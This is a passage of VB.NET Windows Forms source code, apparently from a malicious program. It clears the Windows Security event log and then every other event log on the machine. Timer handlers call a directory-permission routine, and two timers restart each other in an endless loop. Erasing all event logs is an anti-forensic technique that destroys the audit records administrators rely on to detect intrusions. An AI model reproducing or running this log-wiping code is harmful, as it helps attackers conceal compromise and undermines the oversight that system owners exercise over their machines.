Dim eventLog = New EventLog("Security", Environment.MachineName)
eventLog.Clear()
For Each eventLog In EventLog.GetEventLogs()
eventLog.Clear()
eventLog.Dispose()
Next
Err:
End Sub
Private Sub Timer5_Tick(sender As Object, e As EventArgs) Handles Timer5.Tick
Timer5.Stop()
AddDirectorySecurity()
End Sub
Private Sub Timer6_Tick(sender As Object, e As EventArgs) Handles Timer6.Tick
Timer6.Stop()
Timer7.Start()
End Sub
Private Sub Timer7_Tick(sender As Object, e As EventArgs) Handles Timer7.Tick
Timer7.Stop()
Timer6.Start()
End Sub
End Class
